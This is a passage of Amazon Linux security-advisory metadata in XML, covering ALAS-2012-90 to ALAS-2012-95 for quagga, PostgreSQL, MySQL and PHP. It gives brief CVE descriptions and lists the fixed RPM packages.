arch="x86_64"><filename>Packages/expat-debuginfo-2.0.1-11.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-90</id><title>Amazon Linux - ALAS-2012-90: low priority package update for quagga</title><issued date="2012-06-19 16:01:00" /><updated date="2014-09-14 16:37:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1820:
Two flaws were found in the way the bgpd daemon processed certain BGP OPEN messages. A configured BGP peer could cause bgpd on a target system to abort via a specially-crafted BGP OPEN message.
The bgp_capability_orf function in bgpd in Quagga 0.99.20.1 and earlier allows remote attackers to cause a denial of service (assertion failure and daemon exit) by leveraging a BGP peering relationship and sending a malformed Outbound Route Filtering (ORF) capability TLV in an OPEN message.
817580:
CVE-2012-1820 quagga (bgpd): Assertion failure by processing BGP OPEN message with malformed ORF capability TLV (VU#962587)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1820" title="" id="CVE-2012-1820" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="quagga-devel" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-devel-0.99.20.1-1.5.amzn1.i686.rpm</filename></package><package name="quagga-debuginfo" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-debuginfo-0.99.20.1-1.5.amzn1.i686.rpm</filename></package><package name="quagga" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-0.99.20.1-1.5.amzn1.i686.rpm</filename></package><package name="quagga-contrib" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/quagga-contrib-0.99.20.1-1.5.amzn1.i686.rpm</filename></package><package name="quagga" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-0.99.20.1-1.5.amzn1.x86_64.rpm</filename></package><package name="quagga-debuginfo" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-debuginfo-0.99.20.1-1.5.amzn1.x86_64.rpm</filename></package><package name="quagga-devel" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-devel-0.99.20.1-1.5.amzn1.x86_64.rpm</filename></package><package name="quagga-contrib" version="0.99.20.1" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/quagga-contrib-0.99.20.1-1.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-91</id><title>Amazon Linux - ALAS-2012-91: medium priority package update for postgresql9</title><issued date="2012-06-19 16:02:00" /><updated date="2014-09-14 16:21:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2143:
The crypt_des (aka DES-based crypt) function in FreeBSD before 9.0-RELEASE-p2, as used in PHP, PostgreSQL, and other products, does not process the complete cleartext password if this password contains a 0x80 character, which makes it easier for context-dependent attackers to obtain access via an authentication attempt with an initial substring of the intended password, as demonstrated by a Unicode password.
A flaw was found in the way the crypt() password hashing function from the optional PostgreSQL pgcrypto contrib module performed password transformation when used with the DES algorithm. If the password string to be hashed contained the 0x80 byte value, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. This made brute-force guessing more efficient as the whole password was not required to gain access to protected resources.
A flaw was found in the DES algorithm implementation in the crypt() password hashing function in PHP. If the password string to be hashed contained certain characters, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength.
816956:
CVE-2012-2143 BSD crypt(): DES encrypted password weakness
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2143" title="" id="CVE-2012-2143" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="postgresql9-debuginfo" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-debuginfo-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-server" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-server-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-libs" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-libs-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-test" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-test-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-contrib" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-contrib-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-plpython" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plpython-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-plperl" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-plperl-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-devel" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-devel-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-pltcl" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-pltcl-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-docs" version="9.1.4" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql9-docs-9.1.4-1.21.amzn1.i686.rpm</filename></package><package name="postgresql9-server" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-server-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-test" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-test-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plpython" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plpython-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-contrib" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-contrib-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-docs" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-docs-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-libs" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-libs-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-devel" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-devel-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-debuginfo" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-debuginfo-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-pltcl" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-pltcl-9.1.4-1.21.amzn1.x86_64.rpm</filename></package><package name="postgresql9-plperl" version="9.1.4" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql9-plperl-9.1.4-1.21.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-92</id><title>Amazon Linux - ALAS-2012-92: low priority package update for mysql51</title><issued date="2012-07-05 13:59:00" /><updated date="2014-09-14 16:22:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2102:
MySQL 5.1.x before 5.1.62 and 5.5.x before 5.5.22 allows remote authenticated users to cause a denial of service (assertion failure and mysqld abort) by deleting a record and using HANDLER READ NEXT.
A flaw was found in the way MySQL processed HANDLER READ NEXT statements after deleting a record. A remote, authenticated attacker could use this flaw to provide such requests, causing mysqld to crash. This issue only caused a temporary denial of service, as mysqld was automatically restarted after the crash.
812431:
CVE-2012-2102 mysql: Server crash on HANDLER READ NEXT after DELETE
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2102" title="" id="CVE-2012-2102" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0874.html" title="" id="RHSA-2012:0874" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="mysql51-server" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-server-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-devel-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-common" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-common-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-libs" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-libs-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-test" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-test-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-devel" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-devel-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-embedded" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-embedded-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-bench" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-bench-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.61" release="4.54.amzn1" epoch="0" arch="i686"><filename>Packages/mysql51-debuginfo-5.1.61-4.54.amzn1.i686.rpm</filename></package><package name="mysql51" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-common" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-common-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-server" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-server-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-bench" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-bench-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-devel" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-devel-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-debuginfo" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-debuginfo-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-libs" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-libs-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-test" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-test-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-5.1.61-4.54.amzn1.x86_64.rpm</filename></package><package name="mysql51-embedded-devel" version="5.1.61" release="4.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql51-embedded-devel-5.1.61-4.54.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-93</id><title>Amazon Linux - ALAS-2012-93: important priority package update for mysql55</title><issued date="2012-07-05 16:07:00" /><updated date="2014-09-14 16:23:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2122:
This update also adds a patch for a potential flaw in the MySQL password checking function, which could allow an attacker to log into any MySQL account without knowing the correct password. This problem
814605:
CVE-2012-2122 mysql: incorrect type case in check_scramble() leading to authentication bypass
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122" title="" id="CVE-2012-2122" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="mysql55-embedded-devel" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-common" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-common-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.24" release="1.24.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.24-1.24.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-common" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-common-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.24-1.24.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.24" release="1.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.24-1.24.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-94</id><title>Amazon Linux - ALAS-2012-94: medium priority package update for postgresql8</title><issued date="2012-07-05 16:08:00" /><updated date="2014-09-14 16:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2655:
PostgreSQL 8.3.x before 8.3.19, 8.4.x before 8.4.12, 9.0.x before 9.0.8, and 9.1.x before 9.1.4 allows remote authenticated users to cause a denial of service (server crash) by adding the (1) SECURITY DEFINER or (2) SET attributes to a procedural language's call handler.
A denial of service flaw was found in the way the PostgreSQL server performed a user privileges check when applying SECURITY DEFINER or SET attributes to a procedural language's (such as PL/Perl or PL/Python) call handler function. A non-superuser database owner could use this flaw to cause the PostgreSQL server to crash due to infinite recursion.
825995:
CVE-2012-2655 postgresql: Ability of database owners to install procedural languages via CREATE LANGUAGE found unsafe (DoS)
CVE-2012-2143:
The crypt_des (aka DES-based crypt) function in FreeBSD before 9.0-RELEASE-p2, as used in PHP, PostgreSQL, and other products, does not process the complete cleartext password if this password contains a 0x80 character, which makes it easier for context-dependent attackers to obtain access via an authentication attempt with an initial substring of the intended password, as demonstrated by a Unicode password.
A flaw was found in the way the crypt() password hashing function from the optional PostgreSQL pgcrypto contrib module performed password transformation when used with the DES algorithm. If the password string to be hashed contained the 0x80 byte value, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. This made brute-force guessing more efficient as the whole password was not required to gain access to protected resources.
A flaw was found in the DES algorithm implementation in the crypt() password hashing function in PHP. If the password string to be hashed contained certain characters, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength.
816956:
CVE-2012-2143 BSD crypt(): DES encrypted password weakness
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2143" title="" id="CVE-2012-2143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2655" title="" id="CVE-2012-2655" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:1037.html" title="" id="RHSA-2012:1037" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="postgresql8-test" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-test-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-pltcl-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-plperl" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plperl-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-contrib" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-contrib-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-docs" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-docs-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-debuginfo-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-server" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-server-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-libs" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-libs-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-plpython-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-devel" version="8.4.12" release="1.35.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql8-devel-8.4.12-1.35.amzn1.i686.rpm</filename></package><package name="postgresql8-plpython" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plpython-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-devel" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-devel-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-debuginfo" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-debuginfo-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-plperl" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-plperl-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-contrib" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-contrib-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-test" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-test-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-docs" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-docs-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-server" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-server-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-libs" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-libs-8.4.12-1.35.amzn1.x86_64.rpm</filename></package><package name="postgresql8-pltcl" version="8.4.12" release="1.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql8-pltcl-8.4.12-1.35.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-95</id><title>Amazon Linux - ALAS-2012-95: medium priority package update for php</title><issued date="2012-07-05 16:09:00" /><updated date="2014-09-14 16:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2386:
Multiple integer overflow flaws, leading to heap-based buffer overflows, were found in the way the PHP phar extension processed certain fields of tar archive files. A remote attacker could provide a specially-crafted tar archive file that, when processed by a PHP application using the phar extension, could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running PHP.
Integer overflow in the phar_parse_tarfile function in tar.c in the phar extension in PHP before 5.3.14 and 5.4.x before 5.4.4 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted tar file that triggers a heap-based buffer overflow.
823594:
CVE-2012-2386 php: Integer overflow leading to heap-buffer overflow in the Phar extension
CVE-2012-2143:
The crypt_des (aka DES-based crypt) function in FreeBSD before 9.0-RELEASE-p2, as used in PHP, PostgreSQL, and other products, does not process the complete cleartext password if this password contains a 0x80 character, which makes it easier for context-dependent attackers to obtain access via an authentication attempt with an initial substring of the intended password, as demonstrated by a Unicode password.
A flaw was found in the way the crypt() password hashing function from the optional PostgreSQL pgcrypto contrib module performed password transformation when used with the DES algorithm. If the password string to be hashed contained the 0x80 byte value, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength. This made brute-force guessing more efficient as the whole password was not required to gain access to protected resources.
A flaw was found in the DES algorithm implementation in the crypt() password hashing function in PHP. If the password string to be hashed contained certain characters, the remainder of the string was ignored when calculating the hash, significantly reducing the password strength.
816956:
CVE-2012-2143 BSD crypt(): DES encrypted password weakness
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2143" title="" id="CVE-2012-2143" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2386" title="" id="CVE-2012-2386" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-intl" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-dba" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.14" release="2.21.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.14-2.21.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.14" release="2.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mssql-5.3.14-2.21.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.14" release="2.21.amzn1" epoch="0" 